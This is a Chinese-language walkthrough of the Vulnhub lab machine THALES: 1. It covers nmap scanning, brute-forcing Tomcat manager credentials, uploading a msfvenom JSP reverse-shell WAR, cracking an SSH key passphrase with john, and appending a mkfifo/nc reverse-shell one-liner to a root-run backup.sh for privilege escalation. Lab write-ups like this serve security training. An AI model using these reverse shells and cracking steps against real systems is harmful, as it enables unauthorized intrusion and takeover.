Vulnhub 靶場 THALES: 1


前期准備:

靶機地址:https://www.vulnhub.com/entry/thales-1,749/

這個靶機和之前的靶機一樣,獲取不到 DHCP 地址,進入系統(網上有很多忘記密碼進入系統的方法)查看時發現,“i” 輸入時會出現以下這種情況:

image

而且很多輸入的字符都混亂了:

image

這些都亂了,沒有“i”字符,那更改網卡就很麻煩,“vi”,“vim”都用不了,那就只能試試 nano 編輯器:

image

之前的網卡都是 ens33 所以推測這個靶機的網卡也是 ens33,修改完成后 Ctrl+x 退出,y 保存,然后直接回車即可:

image

重啟一下服務,獲取到了地址:

image

kali攻擊機IP:192.168.11.129
靶機地址:192.168.11.176

一、信息收集

1.使用nmap對目標靶機進行掃描

nmap -A -p 1-65535 192.168.11.176

image

發現開放了22和8080端口

2.收集頁面信息

訪問8080端口:

image

發現是個 tomcat 頁面,有登錄窗口:

image

3.爆破 Tomcat

使用msf爆破一下:

image

設置目標靶機並進行爆破:

image

image

解得:tomcat:role1

二、漏洞攻擊

1.上傳shell文件

登錄進去看一下:

image

點擊 Server Status 再次輸入用戶名密碼:

image

在 List Applications 頁面發現可以上傳文件的地方:

image

那就上傳一個反彈shell試試,創建反彈shell Tomcat - HackTricks 中有相關的使用方法:

image

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.11.129 LPORT=1234 -f war -o revshell.war

image

上傳文件訪問並監聽:

image

image

image

nc連接成功,

2.收集用戶 Tomcat 的信息

查看一下是 python2 還是 python3:

image

是 python3 ,寫入交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

image

可以升級一下 shell

查看一下權限:

image

不是之前發現的密碼,那就看一下其他的信息:

在 /home 目錄下發現了一些信息:

image

發現 backup.sh 文件可以運行系統指令:

image

user.txt 文件沒有權限查看,除此之外還發現了 .ssh 文件夾:

image

發現有私鑰,那就可以用 ssh2john.py 生成密碼文件然后爆破,保存秘鑰到本地:

image

用 ssh2john.py 腳本編譯一下:

/usr/share/john/ssh2john.py id_rsa > crack.txt

image

爆破:

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

image

解得密碼為:vodka06

3.收集用戶 thales 的信息

在 nc 連接的 tomcat 中切換 thales 用戶:

image

切換成功,查看一下 /home 目錄下的信息:

image

user.txt 文件中有字符串,md5解碼:

image

能解出,要收費,先看 notes.txt 文件中的信息,剛才發現也沒有利用:

image

可以看出是root運行的,查看文件權限:

image

發現我們讀寫執行都可以。

三、提權

在其中添加反彈shell(一些反彈shell可以參考 pentestmonkey 網站上的):

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 1235 >/tmp/f" >> backup.sh

image

用 nc 監聽 1235 端口,等了一會就連上了:

image

image

獲得了root。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM